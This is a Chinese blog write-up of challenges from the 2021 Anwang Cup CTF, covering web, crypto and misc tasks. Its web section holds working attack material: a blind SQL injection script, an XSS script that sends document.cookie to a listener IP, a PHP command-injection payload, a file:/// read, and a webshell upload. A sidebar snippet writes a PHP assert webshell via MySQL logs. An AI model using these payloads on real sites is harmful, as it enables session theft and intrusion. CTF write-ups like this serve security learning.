2021安网杯部分wp

最新推荐文章于 2021-12-23 16:14:19 发布
最新推荐文章于 2021-12-23 16:14:19 发布
阅读量1k 收藏 5
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53086690/article/details/116761509
版权

目录

Web

Web01

Web的第一个是文件上传。上传一个一句话图片,然后抓包改一下后缀名。改为php。提交之后,蚁剑连接直接去读取flag就可以了。

Web02

第二个Web题是sql注入题。提示的非常明显,输入’直接报错。
布尔型sql注入题,过滤了=,like等form,for绕过,<>绕过 =
献上大佬的代码

import requests
from requests.models import encode_multipart_formdata
class TrickUrlSession(requests.Session):
	def setUrl(self, url):
		self._trickUrl = url
 	def send(self, request, **kwargs):
 		if self._trickUrl:
 			request.url = self._trickUrl
 			return requests.Session.send(self, request, **kwargs)
def format(s):
 	s = s.replace(" ","/**/")
 	s = s.replace("and","%26%26")
	return s
def sql(payload):
 	burp0_url = "http://172.20.2.2:9001/"
# burp0_url = "http://127.0.0.1:9001/"
 	burp0_cookies = {"session": "eyJ1c2VybmFtZSI6Imd1ZXN0In0.YJn_9g.ovL1KTEt9f9hjEDMoZoplRtnEc"}
 	burp0_headers = {
 	"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 
 	"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", 
 	"AcceptLanguage": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 
	"AcceptEncoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
	"Origin": "http://172.20.2.2:9001", 
	"Connection": "close",
	"Referer":"http://172.20.2.2:9001/", 
	"Upgrade-Insecure-Requests": "1"
	}
	burp0_data = {"from": "1", "to": f"{payload}"}
 # print(burp0_data)
 	res = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies,data=burp0_data)
 # print(burp0_url,len(res.text))
 if "ဌํྌ" in res.text:
	 return True
	 # print(format("and (select user() like 'r%')"))
chars = '{}-ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghiklmnopqrstuvwxyz0123456789,'
s = ""
for i0 in range(1,999):
 	for i in range(len(chars)):
		# database train
		# flaggtable,tickets
		# flaggcolumn
		# payload = format(f"-1' or ascii(mid((select group_concat(column_name) from information_schema.columns where table_name in ('flagtable')) from {i0} for 1)) <>'{ord(chars[i])}")
 		payload = format(f"-1' or ascii(mid((select flagcolumn from flagtable) from {i0} for 1))<>'{ord(chars[i])}")
 		# payload = format(f"-1' or ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema in (database())) from {i0} for 1)) <>'{ord(chars[i])}")
 		# payload = format(f" and substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{i0},1)='{chars[i]}'")
		if sql(payload):
		s += chars[i]
		print(s)

Web03

这个题一看和Hgame的Week3的一个Web题很像。想到用XSS来获取Cookie参数。在首页查看过滤情况。在反馈页面提交payload来获取Cookie。带着Cookie来访问admin网页。
先在本地搭建接听Cookie的js.
献上大佬的js代码

username=document.cookie
var xmlhttp = window.XMLHttpRequest ? new XMLHttpRequest() : new
ActiveXObject('Microsoft.XMLHTTP');
xmlhttp.open("POST", "http://172.20.20.165:8081/", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.onreadystatechange = function ()
{
	if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
	{
		if(xmlhttp.responseText=='1')
 			location.href='./admin/backendmanage.php';
 		else
 			alert("Login Failed!");
 	}
}
xmlhttp.send("username="+encodeURIComponent(username));

python3 -m http.server 8000启动web服务访问js
nc -lv 8081 用来接收cookie
/func2?name=%3Cscscriptript+src%3D%22hhttpttp%3A%2F%2F172.20.20.165%3A8000%2F1.js%22%3E%3C%2Fsscriptcript%3E&submit=Get+It%21

Web04

这个直接提交get参数?txt=flie:///flag读取flag

Web05

include("/etc/passwd")提示有openbasedir
scandir system等函数提示被ban没有cat命令。直接more空格$IFS$9进行绕过,因为写到PHP中所以需要\转义
?action=upload&data=<?='more\$IFS\$9../../../../../../f1*\$IFS\$9/1'?>

Web06

查看robots.txt可以看到用户名guest密码后来比赛方给出了字典
提交的账号密码都变成了账号:密码然后base64加密。所以直接进行爆破可以查出来密码是letmein。登录后有一个admin的php打开显示不是admin查看cookie里面有一串jwt格式的session。题目没有key ,于是猜测没有key。生成无认证的jwt带着jwt访问成功跳转。得到flag.php和id_rsa。利用rsa解出flag密码

Crypto

凯撒也喜欢二进制

先查看二进制,发现二进制长度除以8余7所以在前边补一个0
然后对二进制进行转字符串发现是base加密,经查证是base32加密。
然后base32解密,是一串16进制数据。然后根据凯撒提示对数据进行移位。直到转出来的字符串里面有flag这个字符串就输出。
脚本如下

import base64
a = '010011010100110100110010010101110100110101001101010000100101101001001101010011100101001101010100010010110101101001001100010001110100100001000110010100100101011101000011010110100100010001000011010001110100111001010010010001000100011101011001010100100101001001001101010001010011010001000100010100110101100100110011010001010100110101010010010100110101011101000011010110100100101001010001010010000100011001010010010101110100011101001111010011000100011001001101010101100101000101010111010000110100111101001100010001000100110101001101001100110100011101001001010110100100010001000110010011010101011001010100010001000100010101011010010010100101011001001101010101100101010001000100010100110101100100110011010001000100100001000010010100110101011101000101010110100100110001000110010011010101011001010011010101110100110101001110010010100101101001001101010011100101001101010100010010110101101001001100010001110100100001000110010100100101011101001101010011010100010001000110010011010101011001010011010001110100100101011010010100100101001101001101010101010101100101010111010010110100111101000100010001100100011101010110010100110101011101000011010110100100101001010100010010000100011001010010010101110100110101001101010001000100011001001101010010010011010001010111010001110101100101011010010100010100110101010110010100100100011101001101010011010101010001000110010001110100011001010011010101110100101101001111010011000100010001001101010110010101100101000111010010110101100101010010010110100100110101001110010100110101010001010011010110100100101001010010010011010101010101011001010101110100110101001101010000100101101001001101010011100101001001010100010100010101101001010010010100100100110101010010010101000100011101001011010011100100110001000110010001110100010100110100010101110100011101011001010110100101101001001101010100100101001101000111010010110101100101001100010001100100011101000110010101000100010001000001010110100101001001010001010011010101010101011001010101110100001101011001010010100101101001001101010011100101001001010100010010010101101001001010010100100100100001000110010100100101011101001101010011010100010001000110010001110100011001010011010101000101000101011010010010100101100101001101010101100101010001000100010100110101100100110011010001100100011101010010010100110101010001000011010110100100110001000110010010000100011001010010010101110100110101001101010001000100011001000111010100100101001101000111010010010101101001010010010100010100100001000110010100100101011101001011010110100101010001000110010001110101001001010011010101000100001101001111010011000100010001001101010101010011001001010111010010110101101001010010010110100100110101001110010100110101011101000011010110100100110001000011010011010101100101011001010001000101001101011001001100110100010101001101010100100101001101010111010000110100111101001100010001000100110101010110010100100100011101001011010110100100110001000110010011010100111001010011010101000100100101011010010001000100010101001101010101100101000101010100010100110101100100110011010001010100110101010010010100110101011101001101010011110100110001000100010011010101011001010100010001110100101101001110010001000100011001000111010001010011010001010111010001110101101001001010010101010100110101010010010100110100011101001011010011010100001001011010010011010100111001010011010001110100101101011010010010100101001001001101010101010101100101010111010010110101100101001010010110100100110101001110010101000100010001000001010110100100110001000011010011010101010100110100010001110100101101001101010000100101101001001101010011100101001101010100010001010101101001001100010001100100110101010110010100100100011101001011010011110100101001011010010011010100111001010011010001110100100101001111010011000100010001001101010110010011001001010111010010110101100101010100010001110100011101000110010100110101011101000011010110100100101001010100010010000100011001010010010101110100100101011010010001000100011001000111010011100101001101010100010000110101100101001100010000100100100001000110010100100101011101001011010011010101010001000110010010000100001001010011010001110100100101011010010010100101010001001101010110010011001101010111010001010100110101010100010001100100011101000110010100100100010001000011010110100100101001010001010011010100100101011010010001110100101101001101010011000100001001001101010110100101001001000100010010110101101001000100010001100100110101001001010110010101011101000011010110100100110001000110010001110100001001010010010001000100101101011010010010100101001001001101010010010101101001010111010010110100110101001100010000100100110101001110010100110100011101001101010110010101001001010011010011010100100101011010010101110100001101011010010001000100001101000111010001100101000101010111010011010101101001000100010001010100110101001001010110100100011101000011010110010011001101000101010011010101101001010011010001110100101101011001010100100101001001001101010100100101010001000111010000110101101001010100010001010100110101011010010101000100010001010011010011110100110001000100010011010100110100110010010001110100101101001101010010100101101001001101010011100101001101010111010000110101101001001100010000110100110101011001010110100101010001010011010110010011001101000110010011010101101001010011010001110100100101011010010100100101011001001101010101100101010001000100010100110101100100110011010001110100011101000010010100110101010001001001010110100100010001000101010011010101100101011001010001000101001101011001001100110100011001000111010100100101001101010100010000110100111101001100010001000100110101011001010110100101011101001011010011100100110001000110010010000100001001010011010101000101000101001111010011000100010001001101010110010101100101000111010010110101101001001100010001010100110101010010010101000100010001000101010110100100101001010010010011010101010100110100010001000101001101011001001100110100011101000111010011100101001101010100010010110101101001010010010100010100110101010101001100100100010001010011010110010011001101000110010001110101001001010011010101000100001101011010010011000100011001001000010001100101001001010111010011010100110101000100010001100100110101001001001101000101011101000111010110010011001101000100010011010101001001010011010001110100101101011010010011000100011001000111010101100101001101010111010011010100111101001100010001000100110101011001010110010100011101001011010110010101001001011010010011010100111001010011010101000101001101011010010010100101001001001101010101010101100101010111010011010100110101000010010110100100110101001110010100110101010001001001010110100100101001010010010011010101011001010011010101000101001101011001001100110100011001000111010010100101001101000111010010010101101001010010010100010100110101010101001100100100011101001011010011010100110001000110010011010101011001010001010101000101000101001111010011000100010001001101010110010101101001010111010010110100111001000100010001100100110101001001001101000101011101000111010110100100101001010101010011010101001001010011010001110100101101011010010100100101101001001101010011100101001101010111010010110101101001001010010100100100110101010010010101000100011101001011010011010100110001000110010011010100011001010100010001000100000101011010010010100101100101001101010110010011001001010100010100110101100100110011010001010100110101010110010100110101010001000011010110100100101001010010010011010101011001010001010101000101001101011001001100110100011001001101010101100101001101010100010000110101101001001010010110010100110101010101010110010101011101001001010110100100010001000110010011010101101001010011010101000100001101011010010010100101000101001000010001100101001001010111010010110100110101010100010001100100110101010110010100110101011101000101010110100100101001011010010010000100011001010010010101110100110101001101010001000100011001000111010100100101001101010100010000110100111101001100010001000100110101001010010100110101011101001001010110100100010001000110010011010101101001010100010001000100000101011010010010100101011001001101010101010011010001000111010010110100111101000100010001100100011101000110010100010101011101000011001111010011110100111101'
for x,i in enumerate(a):
    if x % 8 == 7 :
        print(i,end='')
        print('\n',end='')
    else:
        print(i,end='')
Hex = ''
for i in range(0,len(a),8):
    print(chr(int(a[i:i+8],2)),end='')
    Hex += chr(int(a[i:i+8],2))
print()
b32 = base64.b32decode(Hex)
for sub in range(200):
    flag = ''
    for i in range(0,len(b32),2):
        data = int(b32[i:i+2],16)
        data = data - sub
        try:
            flag +=chr(data)
        except:
            pass
    if 'flag' in flag:
        print(flag)
    else:
        pass

借鉴EDI战队的Web的WP

easy_RSA

一开始真的没有解出来,一直想分解n但是一直没分解。后来发现直接可以用维纳攻击。
下面攻击代码放在这
一些安装的模块在https://github.com/pablocelayes/rsa-wiener-attack这里

from tools import *
from RSAwienerHacker import hack_RSA
import libnum
n = '1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93bf'
e = 'e42a12145eaa816e2846200608080305c99468042450925789504307cbc54a20ed7071b68b067b703a1679d861795542f8cbd2d1cb4d3847d0940cac018cdb0fa729571afbe10c1b8be2dd8acd99ee48b77d53c435b9c2fed59e12e02ad8cfc2bcc46ad85534c266dcc1f3a1a03d87118eaf3f5b3eeeb3be84ad023a4bf34939'
c = 'd19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3'
n = int(hex_ten(n))
e = int(hex_ten(e))
enc = int(hex_ten(c))
d=hack_RSA(e,n)
m=pow(enc ,d ,n)
print(libnum.n2s(m))

Misc

misc1

打开给的文件。一个图片和一个流量包。

在流量包里面发现有flag.zip查看发现
在这里插入图片描述不是真的flag,提示在aobai那。然后寻找aobai.zip
在这里插入图片描述发现是个zip压缩包。然后将zip弄下来。放到kali里面进行binwalk文件分离。
有个16进制文件,进行16转字符串就出来flag了。

misc2

得到密文
5a6e4665536e506248206579666b7b39733930733833742d393637312d3433626a2d616f69302d3235663176393138707030377d
进行十六进制转换得到
ZnFeSnPbH eyfk{9s90s83t-9671-43bj-aoi0-25f1v918pp07}
然后对密文进行维吉尼亚解密
密文为eyfk{9s90s83t-9671-43bj-aoi0-25f1v918pp07}密钥为ZnFeSnPbH直接出flag
flag{9a90f83e-9671-43ac-bbd0-25b1d918ca07}

misc3

修改文件头为50解压
然后用7z直接提取文件。在文件头部补齐png文件头
89 50 4E 47然后将图片的高进行修改。最终出现flag
在这里插入图片描述

摸鱼的码农
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
UNCTF2021 部分wp.pdf
12-10
unctf2021
BMZCTF:凯撒喜欢二进制
末初的CSDN博客
04-28 981
http://www.bmzclub.cn/challenges#%E5%87%AF%E6%92%92%E4%B9%9F%E5%96%9C%E6%AC%A2%E4%BA%8C%E8%BF%9B%E5%88%B6 cipher.txt 8为二进制一组,发现最后一组少了一位,在二进制数据前加一个0,然后Python简单处理 with open('cipher.txt') as f: f = f.read() for i in range(0,len(f),8): prin
2018 SCTF 部分wp
Risker
06-21 2052
弱弱的web狗表示简直就没有活路....Webeasiest  web-phpmyadmin参考这篇:地址执行以下sql语句:set global general_log='on'; SET global general_log_file='D:/phpStudy/WWW/cmssssacsd.php'; SELECT '&lt;?php assert($_POST["cmd"]);?&gt;'用...
搜索初步—二进制枚举
凯撒袁六兽的blog
01-03 179
二进制枚举初步 1. 过程: 枚举是将所有的可能性举出,然后根据自身的条件,将符合自己目标的可能性筛出的过程,将所有可能性举出的方法有很多,二进制枚举是运用二进制位运算将所有可能性举出的过程。 2.实质: 是通过二进制运算,将已有数据进行有限次的排列组合的过程,用于解决几种或多种情况组合的问题。 3.模板代码(我现在还没有办法解释原因,但我迟早会回来修正的!!!) 一共有n个数字,从中选组若干个数...
CTF密码学之凯撒解密
Unitue_逆流
01-26 5403
1、题目提示:MGAKUZKRWZWGAWCP 2、使用在线解密网站test it:http://www.cryptool-online.org/index.php?option=com_cto&view=tool&Itemid=96&lang=en输入字符后,取消Lower case,调节key的值,当key的值为2时,得到key 的值 得到答案:CTF{XIPUXUEYUAN}
凯撒密码的原理以及实现
03-10 4941
凯撒密码是一种古老的加密算法。密码的使用最早可以追溯到古罗马时期,《高卢战记》有描述恺撒曾经使用密码来传递信息,即所谓的“恺撒密码”,它是一种替代密码,通过将字母按顺序推后起3位起到加密作用,如将字母A换作字母D,将字母B换作字母E。因据说恺撒是率先使用加密函的古代将领之一,因此这种加密方法被称为恺撒密码。这是一种简单的加密方法,这种密码的密度是很低的,只需简单地统计字频就可以破译。 现今又叫
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 wp 解题思路
08-17
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 wp 解题思路
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题
08-17
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 CTF 2021 指挥官杯 wp 真题
UNCTF2021WP.pdf
12-10
UNCTF2021WP.pdf
2021第一届网刃杯网络安全大赛.zip
09-13
2021第一届网刃杯网络安全大赛.zip
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
关于凯撒密码的一些问题
做而论道的博客
01-25 2395
关于凯撒密码的一些问题,谁能给我解释下这段程序啊? 谢谢了,最好是每句都解释下。悬赏分:10 - 解决时间:2009-10-22 16:41 #include main(){   char M[100];   char C[100];   int K = 3, i;   printf("请输入明文M(注意不要输入空白串)\n");   gets(M);   for(i = 0; M[i] != '
强网杯2021 ctf线上赛ezmath wp(#超详细,带逆向新手走过一个又一个小坑)
漫小牛的博客
06-21 3420
文章目录引言第一步、分析文件类型1.可执行文件判断 引言 这是强网杯2021中的一道Reverse题,将附件进行下载,名称为ezmath,名称为chall,说明这道题跟数学有关,都说ctf比赛三大谎言:ez、eazy和baby,名称简单,实则并不简单。做出这道题,需要的数学知识远远大于逆向知识。 题目附件: 链接:https://pan.baidu.com/s/13TheaHB7XcbGnBp-M1N5Rg 提取码:k4pm 第一步、分析文件类型 1.可执行文件判断 使用Exeinfo PE查看文件的类型,
2021强网杯青少年专项赛-科普赛 WP
Moxin1044的博客
10-11 2733
试卷时间:2021-09-2509:00:00-2021-09-3017:00:00 试卷说明:本次考试共设置30道考题,单选题3分/道,多选题4分/道,满分100分。请在考试规定时间内进行答题,如未作答将自动提交且不会记录分数。 一、单项选择题 1、以下做法错误的是?() A、进出办公场所及机房需进行登记、记录 B、办公及机房出入无需专人值守并陪同,自己去 C、重要区域配备电子门禁系统 D、办公区域及机房配备监控系统及防盗报警系统 您的答案:B标准答案:B 2、给系...
强网杯2021 pwn部分wp
eeeeeight的博客
06-18 1230
baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相加再相加相加…直到变成一个byte的数字, 然后加到输入数据的后一位上, 因此我们可以尝试控制输入的内容, 从而控制下一个chunk的size大小 在确定完溢出点后, 我们便开始准备伪造chunk了, 由于要满足p->fd->bk == p, p->bk->fd == p以及prevsize == size, 我们需要申请一个largebin的chunk
2021深育杯-网络安全大赛专业竞赛部分wp
七堇年的博客
12-23 2279
2021深育杯-网络安全大赛专业竞赛
强网杯2021——wp
m0_46296905的博客
11-30 4007
文章目录一、MISC(一)ISO1995(二)BlueTeaming(三)EzTime(四)Cipherman(五)threebody 一、MISC (一)ISO1995 题目描述:We follow ISO1995. ISO1995 has many problems though. One known problem is a time. 压缩包解压密码:fantasicqwb2021 光看文件头辨别不出什么文件,file命令看一下发现是Linux Debian的磁盘文件 binwalk提取出一个I
2019掘安杯网络安全赛web题write up
qq_43741449的博客
04-10 1026
2019掘安杯网络安全赛web题write up(萌新) web1:link:http://120.79.1.69:10001/ 签到题,点开题目网址,再点开链接,跳转到404NOT FOUND页面,在跳转的过程中利用burp suite抓包得flag,再对flag进行base64解密,得最后flag,提交。 flag web2:link:http://120.79.1.69:10004/ 此题先...
2021陇剑杯线下赛 wp
最新发布
09-02
2021陇剑杯线下赛wp指的是该比赛的胜利方案(Winning Proposal)。这个问题的答案取决于具体的比赛和题目,因此我无法提供具体的场景和情况。不过,我可以向你介绍一些常见的比赛wp示例,帮助你理解wp的含义。 通常...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值